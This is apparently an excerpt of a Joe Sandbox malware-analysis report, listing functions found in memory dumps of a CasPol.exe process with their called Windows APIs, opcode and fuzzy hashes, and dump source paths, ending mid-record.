Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fde304abcc05e9e96c71804a40cb87c145093ededb81729656c2a78cb4e5399b
Instruction ID: 6871276cac8071a31fd8b63668414a6375775962f45dca7399fd3ed9b126af91
Opcode Fuzzy Hash: fde304abcc05e9e96c71804a40cb87c145093ededb81729656c2a78cb4e5399b
Instruction Fuzzy Hash: 365258B4A01224CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C217 Relevance: 2.1, APIs: 1, Instructions: 581libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63571125ffb1be33be8b2e393ae5afb76b6e219b3f7ad1680a85bc05c21ce009
Instruction ID: f5e15cea997853f415c35ee1cbfa8f877fc4637b6d5be280efd26e528b92bd96
Opcode Fuzzy Hash: 63571125ffb1be33be8b2e393ae5afb76b6e219b3f7ad1680a85bc05c21ce009
Instruction Fuzzy Hash: F54258B4A01224CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C274 Relevance: 2.1, APIs: 1, Instructions: 570libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0f194e06c041b5566af628a23e390cdd9da29a8a5c458d575babf76c68e69c7
Instruction ID: 96f5333b1b70108eb4585e21016aabc3e01b83fc20102a8948672704f4c9336a
Opcode Fuzzy Hash: e0f194e06c041b5566af628a23e390cdd9da29a8a5c458d575babf76c68e69c7
Instruction Fuzzy Hash: EA4258B4A01224CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C2BB Relevance: 2.1, APIs: 1, Instructions: 563libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d388bce53c539c071e032de51ce51e631d33f19279a5eb56cddb464ab476bafe
Instruction ID: ce3a532a8e1052250ff549380a7c26ac0955f20898680a715600c89fb34a99ed
Opcode Fuzzy Hash: d388bce53c539c071e032de51ce51e631d33f19279a5eb56cddb464ab476bafe
Instruction Fuzzy Hash: 444257B4A01224CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C318 Relevance: 2.1, APIs: 1, Instructions: 552libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d126f0838bac6b5ffb189d3da74e4d9bf3b85e8d725e082ad8e7312ef2648d2
Instruction ID: cd110fe43b6956b922a63bf32464b3bffe8ab7b0e1cafe0869f5c1617e6f85ef
Opcode Fuzzy Hash: 8d126f0838bac6b5ffb189d3da74e4d9bf3b85e8d725e082ad8e7312ef2648d2
Instruction Fuzzy Hash: 044257B4A01224CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C35F Relevance: 2.0, APIs: 1, Instructions: 543libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e3166aa62deef6850edef2c506189c99c4bce6dbad00cb9841a050e139931ff
Instruction ID: ffb5aa4183b277d815eb22760e73e615d5097f3ee946fe4909111db2529461f8
Opcode Fuzzy Hash: 6e3166aa62deef6850edef2c506189c99c4bce6dbad00cb9841a050e139931ff
Instruction Fuzzy Hash: F44257B4A01224CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C39D Relevance: 2.0, APIs: 1, Instructions: 538libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41d409f3fe14f374443e32acfd71e8e43b728306dd86be6037cc30924f9439f8
Instruction ID: 41ea1cd9cdca3fc5c131d93a2ddd0c327d28a2b0a0f174105987b3b2d67e1742
Opcode Fuzzy Hash: 41d409f3fe14f374443e32acfd71e8e43b728306dd86be6037cc30924f9439f8
Instruction Fuzzy Hash: 4E4246B4A01228CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C3E4 Relevance: 2.0, APIs: 1, Instructions: 531libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 796c4d30310ff61a367e02f8414fbb0979670eb6ad1e9623f5277a293d70ffa6
Instruction ID: 0d00b670d696c5574b52d923c7febed398f3c12a25291ffce29f41d1187d2122
Opcode Fuzzy Hash: 796c4d30310ff61a367e02f8414fbb0979670eb6ad1e9623f5277a293d70ffa6
Instruction Fuzzy Hash: 493246B4A01228CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0104C42B Relevance: 2.0, APIs: 1, Instructions: 524libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2dfa2d241dd301c220bde97a812d70085aa766f1b5261ea9e0d5f87009e0a6fa
Instruction ID: a53e27a8a93a718be938db999b9dbbae1d7d0a5690c5b0aaae6c594a241d5e73
Opcode Fuzzy Hash: 2dfa2d241dd301c220bde97a812d70085aa766f1b5261ea9e0d5f87009e0a6fa
Instruction Fuzzy Hash: CA3245B4A01228CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744CF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C472 Relevance: 2.0, APIs: 1, Instructions: 517libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 44a5625a2bde52a6c76047b1931e1181d2c6b3fd36f689ede970a5cd59615b0d
Instruction ID: 867230d2824ee7332406b4c8f7a08b029d290f783b1800ae8ad8a60e118921d5
Opcode Fuzzy Hash: 44a5625a2bde52a6c76047b1931e1181d2c6b3fd36f689ede970a5cd59615b0d
Instruction Fuzzy Hash: 883246B4A01228CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C4B9 Relevance: 2.0, APIs: 1, Instructions: 510libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc875d85dff38ddd67c360fb6091476f87d30f5d085737260f42ec2c834ad519
Instruction ID: 6b407173e213b5c2bd7a5e604d63cde8cebfb7c8a8a7f79bfca8ded989c9aadc
Opcode Fuzzy Hash: bc875d85dff38ddd67c360fb6091476f87d30f5d085737260f42ec2c834ad519
Instruction Fuzzy Hash: 1C3235B4A01228CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C500 Relevance: 2.0, APIs: 1, Instructions: 503libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aec35c327138a5fe56d49a88c32392aaa7f51d6b974a4c7eeea8b06922f3d3e5
Instruction ID: 544294c51a29792ec98d0b198051e156a2381bc825c595864201a75f29eeea9c
Opcode Fuzzy Hash: aec35c327138a5fe56d49a88c32392aaa7f51d6b974a4c7eeea8b06922f3d3e5
Instruction Fuzzy Hash: 723235B4A01228CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C547 Relevance: 2.0, APIs: 1, Instructions: 496libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36eb5ca9b65b77622d17ed856fcd21b901e2db63c87008c1c1edfa62b85129c1
Instruction ID: 55852901bb54ff7b55b28e136f423ecd2432df81473e657b7c397f97e382f864
Opcode Fuzzy Hash: 36eb5ca9b65b77622d17ed856fcd21b901e2db63c87008c1c1edfa62b85129c1
Instruction Fuzzy Hash: EA3234B4A01228CFCB68EF74C88869DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C58E Relevance: 2.0, APIs: 1, Instructions: 489libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f59e4db2bce02bfeb02aeac7fd038db1cd3bc91d0e5f70dffae9c900b2bcc652
Instruction ID: 2874ce3e1512d6365b90b65ce6d3d060e070607a65b3c6b7649e9e0ac95c1649
Opcode Fuzzy Hash: f59e4db2bce02bfeb02aeac7fd038db1cd3bc91d0e5f70dffae9c900b2bcc652
Instruction Fuzzy Hash: 032235B4A012288FCB68EF74C88869DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C5D5 Relevance: 2.0, APIs: 1, Instructions: 482libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92ce111eafe356a543b6b2de0a9a1971b593859e93c60a8ddc9bcab92c065564
Instruction ID: 35123834062d338dc3055367a9cf4318bf5cad6fe9399cb1ab51186140e69c15
Opcode Fuzzy Hash: 92ce111eafe356a543b6b2de0a9a1971b593859e93c60a8ddc9bcab92c065564
Instruction Fuzzy Hash: 462234B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C61C Relevance: 2.0, APIs: 1, Instructions: 475libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98085832908b9fce7c833e7b9f8fc96da49684d902801b426e65fef25ded4f9e
Instruction ID: 8c09a753bb3626ae58ca4924696c01d9895aa3894213d12734ac195b1e720d35
Opcode Fuzzy Hash: 98085832908b9fce7c833e7b9f8fc96da49684d902801b426e65fef25ded4f9e
Instruction Fuzzy Hash: 192235B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C663 Relevance: 2.0, APIs: 1, Instructions: 468libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 81db138c7547aef7ddbc65ac9bafb4239ab4778e8e18a17255e9ce241f27e80e
Instruction ID: 087d34f11fa28b2282112af92651eba051c17e88ea8d5e56cf25b64864566130
Opcode Fuzzy Hash: 81db138c7547aef7ddbc65ac9bafb4239ab4778e8e18a17255e9ce241f27e80e
Instruction Fuzzy Hash: A32235B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C6AA Relevance: 2.0, APIs: 1, Instructions: 461libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 30978570156ef2dbef6bdba6fd25a7a596da890236fcd7c78c9e272eb1a5d86f
Instruction ID: e85031ecb8c42b874cf3f31cbc75d1e052bffbd4d6ecc66c9dbfd9ba48268b09
Opcode Fuzzy Hash: 30978570156ef2dbef6bdba6fd25a7a596da890236fcd7c78c9e272eb1a5d86f
Instruction Fuzzy Hash: 162245B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C6F1 Relevance: 2.0, APIs: 1, Instructions: 454libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4b6619655b385fef39ce73cd4bc773abfe9055d74783e2388521fc9e49751d7
Instruction ID: 25f4628bb1bb966a72d358f193c78661acfea16600e70d4fb39df24747a81dbc
Opcode Fuzzy Hash: b4b6619655b385fef39ce73cd4bc773abfe9055d74783e2388521fc9e49751d7
Instruction Fuzzy Hash: FF2245B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C73B Relevance: 1.9, APIs: 1, Instructions: 447libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71511f09cb3c845ead091b9b092468748d27a35e34c623bf9aab15cdb3a22300
Instruction ID: 193c63a45962b1660056080a55bbfc0044a7961feac600e6398124d22019d17d
Opcode Fuzzy Hash: 71511f09cb3c845ead091b9b092468748d27a35e34c623bf9aab15cdb3a22300
Instruction Fuzzy Hash: D21255B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C785 Relevance: 1.9, APIs: 1, Instructions: 438libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9404962c9e509d0a50def28eb519cb605672f7ff374674b30becbae25914e6ef
Instruction ID: 98ee0e9d80d2bd5c13bad4ed6359702116301a1279b961ac593bb54f9b4d3902
Opcode Fuzzy Hash: 9404962c9e509d0a50def28eb519cb605672f7ff374674b30becbae25914e6ef
Instruction Fuzzy Hash: 8F1256B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3744DF399E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0104C7C3 Relevance: 1.9, APIs: 1, Instructions: 433libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 04bfc5fb47f09ad634b749144d881394ce52f9057e26157fd315ec51f7a61ec9
Instruction ID: 83c7444ff6fd89e0909fb8dbf41caa5c35bb53838397e5d8aaa6309e03550e0c
Opcode Fuzzy Hash: 04bfc5fb47f09ad634b749144d881394ce52f9057e26157fd315ec51f7a61ec9
Instruction Fuzzy Hash: A91255B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3344DF399E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0104C80D Relevance: 1.9, APIs: 1, Instructions: 426libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78e1723929792dff04323c47a279e3aa955a2c7e9366f1b04f37ef8a954b3642
Instruction ID: 753566225c7167b3db35510b8dbeaf2d42c02bdd2549bd45a0998bf8f85d61ff
Opcode Fuzzy Hash: 78e1723929792dff04323c47a279e3aa955a2c7e9366f1b04f37ef8a954b3642
Instruction Fuzzy Hash: AC1256B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3344DF399E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0104C857 Relevance: 1.9, APIs: 1, Instructions: 419libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ba1b8b2166a1ab08796baf88e421229c048ade3543fb93b460eef2cc6140e9b
Instruction ID: 3b358ee4b9cb8ff695d30254aa73fd3d12d4ac3d436916c01030d3a4751111d0
Opcode Fuzzy Hash: 2ba1b8b2166a1ab08796baf88e421229c048ade3543fb93b460eef2cc6140e9b
Instruction Fuzzy Hash: 861245B4A012288FCB68EF74C88879DB7B6BF98205F5084E9D549A3344DF399E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0104C8A1 Relevance: 1.9, APIs: 1, Instructions: 412libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0104C9F5

Memory Dump Source

Source File: 00000004.00000002.89315138843.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd44151c8a2eab1850e34e55c809b113fe3a76760df259b9fe9d8e2050bee515
Instruction ID: 199e95950fbb688b60a4fab34c9aaa529d7ef033c25bc54d2fafce2f84daf793
Opcode Fuzzy Hash: cd44151c8a2eab1850e34e55c809b113fe3a76760df259b9fe9d8e2050bee515
Instruction Fuzzy Hash: 070235B4A012288FCB68AF74C88879DB7B6BF98205F5084E9D549E3344DF399E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 014632D8 Relevance: 1.7, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

(oWl, xrefs: 01463311

Memory Dump Source

Source File: 00000004.00000002.89316733808.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1460000_CasPol.jbxd

Similarity

API ID:
String ID: (oWl
API String ID: 0-3065459248
Opcode ID: 18a94c0c1a0a772508edb7323d6fdfc1d1ccb0d872f1b7abef133b62174200c7
Instruction ID: d927c95b5d65da8486e937b0752c7a2abd68bfe152be81de734b56a17dc78de2
Opcode Fuzzy Hash: 18a94c0c1a0a772508edb7323d6fdfc1d1ccb0d872f1b7abef133b62174200c7
Instruction Fuzzy Hash: 10026B70A00145DFCB11CF68C584AAEBBFAFF89358F158956E5099B3B1C734E981CB62

Uniqueness

Uniqueness Score: -1.00%

Function 010B0AB8 Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010B0AF9

Memory Dump Source

Source File: 00000004.00000002.89315485943.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9f6a4e07d24a23a9920534be1d8c7c3f6d775eaf3401e3186e580e0b61690bd
Instruction ID: 6dc179b97a5e4fb119aa4229fefd5ba27cb89e65368553494e530396023832e2
Opcode Fuzzy Hash: e9f6a4e07d24a23a9920534be1d8c7c3f6d775eaf3401e3186e580e0b61690bd
Instruction Fuzzy Hash: 7D614C34A10319DFDB18EF74C9987AFBBF5AF44345F108428E546A7298DF38A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010BECB0 Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.89315485943.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8b29b60570ccd44be14cb4008a5feedea2cb9f776633c5e05ba59097a3f400
Instruction ID: b502efa495c322cd2a580eb7d850619c883048cd3954daf28fdbb12e09517d09
Opcode Fuzzy Hash: cb8b29b60570ccd44be14cb4008a5feedea2cb9f776633c5e05ba59097a3f400
Instruction Fuzzy Hash: 05412731E083958FCB00DF79D8542EEBFF4AF8A314F0585AAD548A7251DB749881CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 1D6C67ED Relevance: 1.6, APIs: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D6C690A

Memory Dump Source

Source File: 00000004.00000002.89335991344.000000001D6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d6c0000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 82a3c8c9fdac9ba27e8d323ce1410bf67ba391b467cd1e99b9f36d76e9348d24
Instruction ID: 6d263bd29c1f0eb3be52a5854648528ba4f7bd1ea01535fae1402e409e2d6ad7
Opcode Fuzzy Hash: 82a3c8c9fdac9ba27e8d323ce1410bf67ba391b467cd1e99b9f36d76e9348d24
Instruction Fuzzy Hash: FF51C0B1D002099FDF14CF99D884ADEBBB5FF98314F24822AE418AB250D771A985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1D6C67F8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D6C690A

Memory Dump Source

Source File: 00000004.00000002.89335991344.000000001D6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d6c0000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9f9188750a5930a2bca554df7fd7f8fb162cea97e86fa25d4c87d8e0a5c06267
Instruction ID: 3b67b3a6ec738b589079dce686f19de96d086c55f9c50b6772faa2d1a9dd0679
Opcode Fuzzy Hash: 9f9188750a5930a2bca554df7fd7f8fb162cea97e86fa25d4c87d8e0a5c06267
Instruction Fuzzy Hash: 4C41AEB1D002099FDF14CF99C984ADEBBB5FF48314F24812AE819AB250D771A985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 010B06B0 Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 010B07B9

Memory Dump Source

Source File: 00000004.00000002.89315485943.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10b0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f553717e1c5631e7189f3c5753d036e85a84bab7d14e7a35fd47bb21af063872
Instruction ID: 8d96c7b267a65a53c6226abdd41f76b14567f66adebb80e23949cbd54ef7acbd
Opcode Fuzzy Hash: f553717e1c5631e7189f3c5753d036e85a84bab7d14e7a35fd47bb21af063872
Instruction Fuzzy Hash: A34134B0E042489FCB10CFA9C984ADEBFF5BF48304F14806AE858AB355D774A905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D6CA610 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D6CA5D7

Memory Dump Source

Source File: 00000004.00000002.89335991344.000000001D6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d6c0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e63c7b58138faee1f792196dc8a15b2e19a08cf5d038db16689260a4b6f764a1
Instruction ID: 9e534131f16f8bc4ce98d31dcfb085a4da7b5022a08d327caf7c486552aebe66
Opcode Fuzzy Hash: e63c7b58138faee1f792196dc8a15b2e19a08cf5d038db16689260a4b6f764a1
